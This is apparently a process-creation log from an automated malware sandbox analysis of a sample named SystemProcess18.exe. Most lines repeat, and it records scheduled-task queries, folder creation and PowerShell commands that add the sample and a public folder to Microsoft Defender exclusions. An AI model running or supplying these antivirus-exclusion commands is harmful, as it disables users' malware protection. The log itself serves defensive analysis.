          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Users\user\Desktop\SystemProcess18.exe "C:\Users\user\Desktop\SystemProcess18.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
